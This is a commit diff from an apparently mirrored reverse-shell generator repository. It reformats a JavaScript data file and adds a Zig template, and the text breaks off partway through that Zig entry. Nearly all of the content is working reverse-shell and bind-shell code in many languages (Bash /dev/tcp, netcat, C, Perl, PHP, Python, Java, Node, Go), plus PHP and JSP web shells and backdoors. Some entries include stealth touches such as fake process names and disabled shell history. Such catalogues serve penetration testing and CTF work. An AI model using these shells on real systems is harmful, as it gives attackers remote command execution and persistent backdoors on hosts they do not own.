mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-02-21 14:16:04 +00:00
cleanup/format + add zig
This commit is contained in:
ArchiMoebius
parent
cf609e544b
commit
c59c14b9a7
86
js/data.js
86
js/data.js
@ -1,4 +1,3 @@
|
||||
|
||||
const CommandType = {
|
||||
'ReverseShell': 'ReverseShell',
|
||||
'BindShell': 'BindShell',
|
||||
@ -20,8 +19,7 @@ const withCommandType = function (commandType, elements) {
|
||||
|
||||
const reverseShellCommands = withCommandType(
|
||||
CommandType.ReverseShell,
|
||||
[
|
||||
{
|
||||
[{
|
||||
"name": "Bash -i",
|
||||
"command": "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1",
|
||||
"meta": ["linux", "mac"]
|
||||
@ -101,7 +99,7 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {\"{shell}\", NULL};\n execvp(\"{shell}\", argv);\n\n return 0; \n}",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "C Windows",
|
||||
"command": "#include <winsock2.h>\r\n#include <stdio.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nWSADATA wsaData;\r\nSOCKET Winsock;\r\nstruct sockaddr_in hax; \r\nchar ip_addr[16] = \"{ip}\"; \r\nchar port[6] = \"{port}\"; \r\n\r\nSTARTUPINFO ini_processo;\r\n\r\nPROCESS_INFORMATION processo_info;\r\n\r\nint main()\r\n{\r\n WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0;\r\n\r\n\r\n struct hostent *host; \r\n host = gethostbyname(ip_addr);\r\n strcpy_s(ip_addr, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));\r\n\r\n hax.sin_family = AF_INET;\r\n hax.sin_port = htons(atoi(port));\r\n hax.sin_addr.s_addr = inet_addr(ip_addr);\r\n\r\n WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);\r\n\r\n memset(&ini_processo, 0, sizeof(ini_processo));\r\n ini_processo.cb = sizeof(ini_processo);\r\n ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; \r\n ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;\r\n\r\n TCHAR cmd[255] = TEXT(\"cmd.exe\");\r\n\r\n CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);\r\n\r\n return 0;\r\n}",
|
||||
"meta": ["windows"]
|
||||
@ -136,16 +134,16 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "Perl PentestMonkey",
|
||||
"command": `#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. The author accepts no liability\n# for damage caused by this tool. If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = "1.0";\n\n# Where to send the reverse shell. Change these.\nmy $ip = '{ip}';\nmy $port = {port};\n\n# Options\nmy $daemon = 1;\nmy $auth = 0; # 0 means authentication is disabled and any \n # source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = "";\nmy $fake_process_name = "/usr/sbin/apache";\n\n# Change the process name to be less conspicious\n$0 = "[httpd]";\n\n# Authenticate based on source IP address if required\nif (defined($ENV{'REMOTE_ADDR'})) {\n cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");\n\n if ($auth) {\n unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {\n cgiprint("ERROR: Your client isn't authorised to view this page");\n cgiexit();\n }\n }\n} elsif ($auth) {\n cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");\n cgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n my $pid = fork();\n if ($pid) {\n cgiexit(0); # parent exits\n }\n\n setsid();\n chdir('/');\n umask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n cgiprint("Sent reverse shell to $ip:$port");\n cgiprintpage();\n} else {\n cgiprint("Couldn't open reverse shell to $ip:$port: $!");\n cgiexit(); \n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, ">&SOCK");\nopen(STDOUT,">&SOCK");\nopen(STDERR,">&SOCK");\n$ENV{'HISTFILE'} = '/dev/null';\nsystem("w;uname -a;id;pwd");\nexec({"{shell}"} ($fake_process_name, "-i"));\n\n# Wrapper around print\nsub cgiprint {\n my $line = shift;\n $line .= "<p>\\n";\n $global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n cgiprintpage();\n exit 0; # 0 to ensure we don't give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n print "Content-Length: " . length($global_page) . "\\r\nConnection: close\\r\nContent-Type: text\\/html\\r\\n\\r\\n" . $global_page;\n}\n`,
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
// {
|
||||
// "name": "PHP Emoji",
|
||||
// "command": "php -r '$😀=\"1\";$😁=\"2\";$😅=\"3\";$😆=\"4\";$😉=\"5\";$😊=\"6\";$😎=\"7\";$😍=\"8\";$😚=\"9\";$🙂=\"0\";$🤢=\" \";$🤓=\"<\";$🤠=\">\";$😱=\"-\";$😵=\"&\";$🤩=\"i\";$🤔=\".\";$🤨=\"/\";$🥰=\"a\";$😐=\"b\";$😶=\"i\";$🙄=\"h\";$😂=\"c\";$🤣=\"d\";$😃=\"e\";$😄=\"f\";$😋=\"k\";$😘=\"n\";$😗=\"o\";$😙=\"p\";$🤗=\"s\";$😑=\"x\";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = \"{ip}\";$💻 = {port};$🐚 = \"{shell}\". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'",
|
||||
// "meta": ["linux", "mac"]
|
||||
// },
|
||||
// {
|
||||
// "name": "PHP Emoji",
|
||||
// "command": "php -r '$😀=\"1\";$😁=\"2\";$😅=\"3\";$😆=\"4\";$😉=\"5\";$😊=\"6\";$😎=\"7\";$😍=\"8\";$😚=\"9\";$🙂=\"0\";$🤢=\" \";$🤓=\"<\";$🤠=\">\";$😱=\"-\";$😵=\"&\";$🤩=\"i\";$🤔=\".\";$🤨=\"/\";$🥰=\"a\";$😐=\"b\";$😶=\"i\";$🙄=\"h\";$😂=\"c\";$🤣=\"d\";$😃=\"e\";$😄=\"f\";$😋=\"k\";$😘=\"n\";$😗=\"o\";$😙=\"p\";$🤗=\"s\";$😑=\"x\";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = \"{ip}\";$💻 = {port};$🐚 = \"{shell}\". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'",
|
||||
// "meta": ["linux", "mac"]
|
||||
// },
|
||||
{
|
||||
"name": "PHP PentestMonkey",
|
||||
"command": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '{ip}';\n$port = {port};\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; {shell} -i';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists('pcntl_fork')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit(\"ERROR: Can't fork\");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); // Parent exits\n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit(\"Error: Can't setsid()\");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\nchdir(\"/\");\n\numask(0);\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit(\"$errstr ($errno)\");\n\texit(1);\n}\n\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>",
|
||||
@ -161,12 +159,12 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER[\'PHP_SELF\']); ?>\">\n<input type=\"TEXT\" name=\"cmd\" id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n<\/form>\n<pre>\n<?php\n if(isset($_GET[\'cmd\']))\n {\n system($_GET[\'cmd\']);\n }\n?>\n<\/pre>\n<\/body>\n<script>document.getElementById(\"cmd\").focus();<\/script>\n<\/html>",
|
||||
"meta": ["linux", "windows", "mac"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "PHP cmd 2",
|
||||
"command": "<?php if(isset($_REQUEST[\"cmd\"])){ echo \"<pre>\"; $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"<\/pre>\"; die; }?>",
|
||||
"meta": ["linux", "windows", "mac"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "PHP cmd small",
|
||||
"command": "<?=`$_GET[0]`?>",
|
||||
"meta": ["linux", "windows", "mac"]
|
||||
@ -257,8 +255,8 @@ const reverseShellCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "Python3 Windows",
|
||||
"command": "import os,socket,subprocess,threading;\ndef s2p(s, p):\n while True:\n data = s.recv(1024)\n if len(data) > 0:\n p.stdin.write(data)\n p.stdin.flush()\n\ndef p2s(s, p):\n while True:\n s.send(p.stdout.read(1))\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"{ip}\",{port}))\n\np=subprocess.Popen([\"{shell}\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\ns2p_thread.daemon = True\ns2p_thread.start()\n\np2s_thread = threading.Thread(target=p2s, args=[s, p])\np2s_thread.daemon = True\np2s_thread.start()\n\ntry:\n p.wait()\nexcept KeyboardInterrupt:\n s.close()",
|
||||
"meta": ["windows"]
|
||||
"command": "import os,socket,subprocess,threading;\ndef s2p(s, p):\n while True:\n data = s.recv(1024)\n if len(data) > 0:\n p.stdin.write(data)\n p.stdin.flush()\n\ndef p2s(s, p):\n while True:\n s.send(p.stdout.read(1))\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"{ip}\",{port}))\n\np=subprocess.Popen([\"{shell}\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\ns2p_thread.daemon = True\ns2p_thread.start()\n\np2s_thread = threading.Thread(target=p2s, args=[s, p])\np2s_thread.daemon = True\np2s_thread.start()\n\ntry:\n p.wait()\nexcept KeyboardInterrupt:\n s.close()",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
"name": "Python3 shortest",
|
||||
@ -295,12 +293,12 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "require('child_process').exec('nc -e {shell} {ip} {port}')",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "node.js #2",
|
||||
"command": "(function(){\r\n var net = require(\"net\"),\r\n cp = require(\"child_process\"),\r\n sh = cp.spawn(\"\{shell}\", []);\r\n var client = new net.Socket();\r\n client.connect({port}, \"{ip}\", function(){\r\n client.pipe(sh.stdin);\r\n sh.stdout.pipe(client);\r\n sh.stderr.pipe(client);\r\n });\r\n return \/a\/; \/\/ Prevents the Node.js application from crashing\r\n})();",
|
||||
"meta": ["linux", "mac", "windows"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "Java #1",
|
||||
"command": "public class shell {\n public static void main(String[] args) {\n Process p;\n try {\n p = Runtime.getRuntime().exec(\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/{ip}/{port} 0>&1\");\n p.waitFor();\n p.destroy();\n } catch (Exception e) {}\n }\n}",
|
||||
"meta": ["linux", "mac"]
|
||||
@ -315,27 +313,27 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "import java.io.InputStream;\nimport java.io.OutputStream;\nimport java.net.Socket;\n\npublic class shell {\n public static void main(String[] args) {\n String host = \"{ip}\";\n int port = {port};\n String cmd = \"{shell}\";\n try {\n Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n Socket s = new Socket(host, port);\n InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n while (!s.isClosed()) {\n while (pi.available() > 0)\n so.write(pi.read());\n while (pe.available() > 0)\n so.write(pe.read());\n while (si.available() > 0)\n po.write(si.read());\n so.flush();\n po.flush();\n Thread.sleep(50);\n try {\n p.exitValue();\n break;\n } catch (Exception e) {}\n }\n p.destroy();\n s.close();\n } catch (Exception e) {}\n }\n}",
|
||||
"meta": ["windows", "linux", "mac"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "Java Web",
|
||||
"command": "<%@\r\npage import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"\r\n% >\r\n<%!\r\nstatic class StreamConnector extends Thread\r\n{\r\n InputStream is;\r\n OutputStream os;\r\n StreamConnector(InputStream is, OutputStream os)\r\n {\r\n this.is = is;\r\n this.os = os;\r\n }\r\n public void run()\r\n {\r\n BufferedReader isr = null;\r\n BufferedWriter osw = null;\r\n try\r\n {\r\n isr = new BufferedReader(new InputStreamReader(is));\r\n osw = new BufferedWriter(new OutputStreamWriter(os));\r\n char buffer[] = new char[8192];\r\n int lenRead;\r\n while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)\r\n {\r\n osw.write(buffer, 0, lenRead);\r\n osw.flush();\r\n }\r\n }\r\n catch (Exception ioe)\r\n try\r\n {\r\n if(isr != null) isr.close();\r\n if(osw != null) osw.close();\r\n }\r\n catch (Exception ioe)\r\n }\r\n}\r\n%>\r\n\r\n<h1>JSP Backdoor Reverse Shell<\/h1>\r\n\r\n<form method=\"post\">\r\nIP Address\r\n<input type=\"text\" name=\"ipaddress\" size=30>\r\nPort\r\n<input type=\"text\" name=\"port\" size=10>\r\n<input type=\"submit\" name=\"Connect\" value=\"Connect\">\r\n<\/form>\r\n<p>\r\n<hr>\r\n\r\n<%\r\nString ipAddress = request.getParameter(\"ipaddress\");\r\nString ipPort = request.getParameter(\"port\");\r\nif(ipAddress != null && ipPort != null)\r\n{\r\n Socket sock = null;\r\n try\r\n {\r\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\r\n Runtime rt = Runtime.getRuntime();\r\n Process proc = rt.exec(\"cmd.exe\");\r\n StreamConnector outputConnector =\r\n new StreamConnector(proc.getInputStream(),\r\n sock.getOutputStream());\r\n StreamConnector inputConnector =\r\n new StreamConnector(sock.getInputStream(),\r\n proc.getOutputStream());\r\n outputConnector.start();\r\n inputConnector.start();\r\n }\r\n catch(Exception e) \r\n}\r\n%>",
|
||||
"meta": ["windows", "linux", "mac"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "Java Two Way",
|
||||
"command": "<%\r\n \/*\r\n * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file.\r\n * If it cannot connect, an HTML will prompt and you can input commands (sh\/cmd) there and it will prompts the output in the HTML.\r\n * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button \"send\" is clicked, it will try to connect to the reverse shell again (apart from executing \r\n * the command specified in the HTML form). This is to avoid to keep it simple.\r\n *\/\r\n%>\r\n\r\n<%@page import=\"java.lang.*\"%>\r\n<%@page import=\"java.io.*\"%>\r\n<%@page import=\"java.net.*\"%>\r\n<%@page import=\"java.util.*\"%>\r\n\r\n<html>\r\n<head>\r\n <title>jrshell<\/title>\r\n<\/head>\r\n<body>\r\n<form METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">\r\n <input TYPE=\"text\" NAME=\"shell\">\r\n <input TYPE=\"submit\" VALUE=\"Send\">\r\n<\/form>\r\n<pre>\r\n<%\r\n \/\/ Define the OS\r\n String shellPath = null;\r\n try\r\n {\r\n if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\r\n shellPath = new String(\"\/bin\/sh\");\r\n } else {\r\n shellPath = new String(\"cmd.exe\");\r\n }\r\n } catch( Exception e ){}\r\n \/\/ INNER HTML PART\r\n if (request.getParameter(\"shell\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"shell\") + \"\\n<BR>\");\r\n Process p;\r\n if (shellPath.equals(\"cmd.exe\"))\r\n p = Runtime.getRuntime().exec(\"cmd.exe \/c \" + request.getParameter(\"shell\"));\r\n else\r\n p = Runtime.getRuntime().exec(\"\/bin\/sh -c \" + request.getParameter(\"shell\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n }\r\n }\r\n \/\/ TCP PORT PART\r\n class StreamConnector extends Thread\r\n {\r\n InputStream wz;\r\n OutputStream yr;\r\n StreamConnector( InputStream wz, OutputStream yr ) {\r\n this.wz = wz;\r\n this.yr = yr;\r\n }\r\n public void run()\r\n {\r\n BufferedReader r = null;\r\n BufferedWriter w = null;\r\n try\r\n {\r\n r = new BufferedReader(new InputStreamReader(wz));\r\n w = new BufferedWriter(new OutputStreamWriter(yr));\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n w.write( buffer, 0, length );\r\n w.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( r != null )\r\n r.close();\r\n if( w != null )\r\n w.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n \r\n try {\r\n Socket socket = new Socket( \"{ip}\", {port} ); \/\/ Replace with wanted ip and port\r\n Process process = Runtime.getRuntime().exec( shellPath );\r\n new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();\r\n new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();\r\n out.println(\"port opened on \" + socket);\r\n } catch( Exception e ) {}\r\n%>\r\n<\/pre>\r\n<\/body>\r\n<\/html>",
|
||||
"meta": ["windows", "linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "Javascript",
|
||||
"command":"String command = \"var host = \'{ip}\';\" +\r\n \"var port = {port};\" +\r\n \"var cmd = \'{shell}\';\"+\r\n \"var s = new java.net.Socket(host, port);\" +\r\n \"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();\"+\r\n \"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\"+\r\n \"var po = p.getOutputStream(), so = s.getOutputStream();\"+\r\n \"print (\'Connected\');\"+\r\n \"while (!s.isClosed()) {\"+\r\n \" while (pi.available() > 0)\"+\r\n \" so.write(pi.read());\"+\r\n \" while (pe.available() > 0)\"+\r\n \" so.write(pe.read());\"+\r\n \" while (si.available() > 0)\"+\r\n \" po.write(si.read());\"+\r\n \" so.flush();\"+\r\n \" po.flush();\"+\r\n \" java.lang.Thread.sleep(50);\"+\r\n \" try {\"+\r\n \" p.exitValue();\"+\r\n \" break;\"+\r\n \" }\"+\r\n \" catch (e) {\"+\r\n \" }\"+\r\n \"}\"+\r\n \"p.destroy();\"+\r\n \"s.close();\";\r\nString x = \"\\\"\\\".getClass().forName(\\\"javax.script.ScriptEngineManager\\\").newInstance().getEngineByName(\\\"JavaScript\\\").eval(\\\"\"+command+\"\\\")\";\r\nref.add(new StringRefAddr(\"x\", x);",
|
||||
"meta":["linux", "mac", "windows"]
|
||||
},
|
||||
{
|
||||
"name": "Groovy",
|
||||
"command":"String host=\"{ip}\";int port={port};String cmd=\"{shell}\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
|
||||
"meta":["windows"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "Javascript",
|
||||
"command": "String command = \"var host = \'{ip}\';\" +\r\n \"var port = {port};\" +\r\n \"var cmd = \'{shell}\';\"+\r\n \"var s = new java.net.Socket(host, port);\" +\r\n \"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();\"+\r\n \"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\"+\r\n \"var po = p.getOutputStream(), so = s.getOutputStream();\"+\r\n \"print (\'Connected\');\"+\r\n \"while (!s.isClosed()) {\"+\r\n \" while (pi.available() > 0)\"+\r\n \" so.write(pi.read());\"+\r\n \" while (pe.available() > 0)\"+\r\n \" so.write(pe.read());\"+\r\n \" while (si.available() > 0)\"+\r\n \" po.write(si.read());\"+\r\n \" so.flush();\"+\r\n \" po.flush();\"+\r\n \" java.lang.Thread.sleep(50);\"+\r\n \" try {\"+\r\n \" p.exitValue();\"+\r\n \" break;\"+\r\n \" }\"+\r\n \" catch (e) {\"+\r\n \" }\"+\r\n \"}\"+\r\n \"p.destroy();\"+\r\n \"s.close();\";\r\nString x = \"\\\"\\\".getClass().forName(\\\"javax.script.ScriptEngineManager\\\").newInstance().getEngineByName(\\\"JavaScript\\\").eval(\\\"\"+command+\"\\\")\";\r\nref.add(new StringRefAddr(\"x\", x);",
|
||||
"meta": ["linux", "mac", "windows"]
|
||||
},
|
||||
{
|
||||
"name": "Groovy",
|
||||
"command": "String host=\"{ip}\";int port={port};String cmd=\"{shell}\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
"name": "telnet",
|
||||
"command": "TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF",
|
||||
"meta": ["linux", "mac"]
|
||||
@ -360,7 +358,7 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"{ip}:{port}\");cmd:=exec.Command(\"{shell}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go",
|
||||
"meta": ["linux", "mac", "windows"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "Vlang",
|
||||
"command": "echo 'import os' > /tmp/t.v && echo 'fn main() { os.system(\"nc -e {shell} {ip} {port} 0>&1\") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v",
|
||||
"meta": ["linux", "mac"]
|
||||
@ -384,16 +382,20 @@ const reverseShellCommands = withCommandType(
|
||||
"name": "Crystal (code)",
|
||||
"command": "require \"process\"\nrequire \"socket\"\n\nc = Socket.tcp(Socket::Family::INET)\nc.connect(\"{ip}\", {port})\nloop do \n m, l = c.receive\n p = Process.new(m.rstrip(\"\\n\"), output:Process::Redirect::Pipe, shell:true)\n c << p.output.gets_to_end\nend",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "Zig",
|
||||
"command": "// See: `zig targets` for a valid list\n//\n// For an 'executable':\n// Windows: zig build-exe -target x86_64-windows-gnu reverse-shell.zig\n// Linux : zig build-exe reverse-shell.zig\n//\n// For a 'library':\n// Windows: zig build-lib -dynamic -target x86_64-windows-gnu reverse-shell.zig\n// Linux: zig build-lib -dynamic reverse-shell.zig\n\nconst std = @import(\"std\");\n\npub fn main() !void {\n var arena = std.heap.ArenaAllocator.init(std.heap.page_allocator);\n defer arena.deinit();\n const allocator = arena.allocator();\n\n while (true) {\n std.time.sleep(5 * std.time.ns_per_s);\n\n const peer = try std.net.Address.parseIp4(\"{ip}\", {port});\n\n const stream = std.net.tcpConnectToAddress(peer) catch {\n continue;\n };\n\n defer stream.close();\n\n var reader = stream.reader();\n const writer = stream.writer();\n\n var buffer: [1024]u8 = undefined;\n\n const FifoBuffer = std.fifo.LinearFifo(u8, .{ .Static = 1024 });\n var fifo = FifoBuffer.init();\n\n while (true) {\n buffer = std.mem.zeroes([1024]u8);\n\n var line = (try reader.readUntilDelimiterOrEof(\n &buffer,\n '\\n',\n )) orelse continue;\n\n if (@import(\"builtin\").os.tag == .windows) {\n line = @constCast(std.mem.trimRight(u8, line, \"\\r\"));\n }\n\n var process: std.process.Child = std.process.Child.init(&[_][]const u8{ 